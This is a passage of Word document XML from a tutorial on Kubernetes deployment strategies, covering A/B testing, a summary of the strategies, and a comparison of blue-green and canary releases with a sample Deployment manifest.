    <w:p w14:paraId="16BD38D4" w14:textId="77777777" w:rsidR="00D056EB"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DD3CC54">
          <v:rect id="_x0000_i2851" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439ED69"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5. A/B Testing Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55D186"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A/B Testing Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a strategy where multiple versions of a service are deployed, and traffic is routed to different versions for testing. The goal is to compare the performance of different versions of the service and see which performs better.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1053EF9A"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1BAC66"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Multiple versions of a service (Version A, Version B, etc.) are deployed in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1D3DE"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Traffic is split between the versions based on predefined criteria (e.g., user segments, random distribution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819CD95"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Analytics are used to compare the versions, and the version with the better performance is chosen for full-scale deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F0901D"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D59136"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Helps in choosing the best version based on real user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173094F1"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Provides insights into user preferences and application performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEB09A"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59CFA0"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Feature comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Comparing two variations of a checkout process in an e-commerce service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EF222"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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BE75B"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Can be implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Traefik</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for advanced traffic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07876235" w14:textId="77777777" w:rsidR="00D056EB"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152914D">
          <v:rect id="_x0000_i2852" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF3E0D" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="00FA65E9" w:rsidRDefault="00D056EB"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C7EC4"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Kubernetes offers several deployment strategies for managing the release of microservices in production environments. The choice of strategy depends on the requirements for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>availability, risk tolerance, and rollback mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here is a brief summary of when to use each strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E823C2"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Rolling Update</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Gradual updates without downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B09B5F"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Blue/Green Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Safe switch between versions with easy rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4579CF"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Canary Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Gradual rollout with early feedback to minimize risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EBC10"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Recreate Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful when a full restart is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B617EB0"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A/B Testing Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Comparing multiple versions to select the best-performing one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76460DB6" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="00FA65E9" w:rsidRDefault="00D056EB"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By selecting the appropriate deployment strategy for each use case, microservices can be deployed, updated, and scaled in Kubernetes efficiently, minimizing downtime and ensuring system stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE48E5" w14:textId="7976F42A" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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F4EB4B3">
          <v:rect id="_x0000_i2853" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E938D3" w14:textId="337B57A2" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="0016094F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="686" w:name="_Toc196308166"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Blue-Green and Canary deployments in microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="686"/>
    </w:p>
    <w:p w14:paraId="250CDEE3" w14:textId="7CA63FC6" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue-Green Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Canary Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are popular strategies for rolling out updates to microservices while minimizing downtime and reducing the risk of introducing bugs into the system. Each has its own advantages and is suited for different use cases. Here’s a detailed comparison of both strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF746A" w14:textId="77777777" w:rsidR="00312742"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8FA78B1">
          <v:rect id="_x0000_i2854" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2116D"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1. Blue-Green Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18535373"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Blue-Green Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a strategy where you maintain two identical environments: one for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>current version</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Blue) and another for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new version</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Green). Only one of them is live at a time, serving production traffic, while the other environment is idle or used for testing. When the new version (Green) is ready, traffic is switched to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB515E1"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How Blue-Green Deployment Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71152DEE"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Blue environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the live production environment, serving the existing version of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FF174"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Green environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is where the new version of the application is deployed and tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312EE1DB"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When the new version is verified and ready for production, the traffic is switched from Blue to Green (usually through a load balancer or DNS update).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B6BEB"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment remains idle or can be used for staging or testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87FCA6"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If any issues arise after switching traffic, the system can be rolled back to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment quickly by rerouting traffic back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF443E6"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Benefits of Blue-Green Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD8EFE"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Zero downtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the Blue environment is still running during the deployment, there is no downtime for users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C38834"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Easy rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If something goes wrong, switching back to the Blue environment is simple and quick.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D1C3E"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lastRenderedPageBreak/>
        <w:t>Stable production</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The old version is fully functional and serves users while the new version is being tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624138D5"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E3A10"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Critical updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When deploying critical services that cannot afford downtime (e.g., payment gateway service, login service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37766D3A"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Implementation Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554915D2"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Blue environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Running version 1 of the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD70BA1"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Green environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Running version 2 of the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6005F"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After successful testing in the Green environment, you reroute traffic from Blue to Green.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9111B"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A02156C"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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC9731"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61410D2A"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name: myservice-green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2E059"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8572DF"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replicas: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094CC39"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B802C"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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220ED2D"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app: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437C558"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version: green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A8D53"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662C6026"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F717815"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F189525"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app: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E8C45"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version: green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F83F7C"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A83ACF"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E4EAF8"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 name: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1708C8"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image: myservice:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8AE95"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E605F"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 containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93F8F9" w14:textId="77777777" w:rsidR="00312742"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BF51C68">
          <v:rect id="_x0000_i2855" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C347D7"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2. Canary Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7E5B6"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Canary Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a strategy where a new version of the application is gradually rolled out to a small subset of users (known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary group</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) before being deployed to the entire production environment. The main goal of canary deployments is to test the new version in a real-world scenario with limited exposure to catch issues early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B245274"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How Canary Deployment Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C1617"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Initial Canary Release</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A small percentage of traffic (e.g., 5-10%) is routed to the new version of the service (the "canary").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268440C"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Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The performance of the canary version is closely monitored to detect any issues, such as bugs or degraded performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25077C71"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Gradual rollout</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the canary version performs well, the percentage of traffic routed to the new version is gradually increased.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3DCD19"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Full rollout</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the new version has been verified and proven stable, it can be fully rolled out to all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF20DF2"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Benefits of Canary Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E0342"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Reduced risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By releasing the update to only a small group of users initially, the risk of widespread failures is minimized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FEF0A"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Early feedback</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can quickly identify bugs or performance issues in a limited scope before they affect the entire user base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA23A69"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Continuous monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The gradual rollout allows continuous monitoring and comparison between the old and new versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A79792"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6EBC8A"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Feature testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rolling out a new feature in a microservice to a subset of users to gather real-world feedback before full-scale release (e.g., a new recommendation algorithm in an e-commerce platform).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43E7AD"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Implementation Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BC71E"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You can implement Canary deployments using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by creating two versions of your deployment and using labels to route traffic. Traffic can be controlled using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
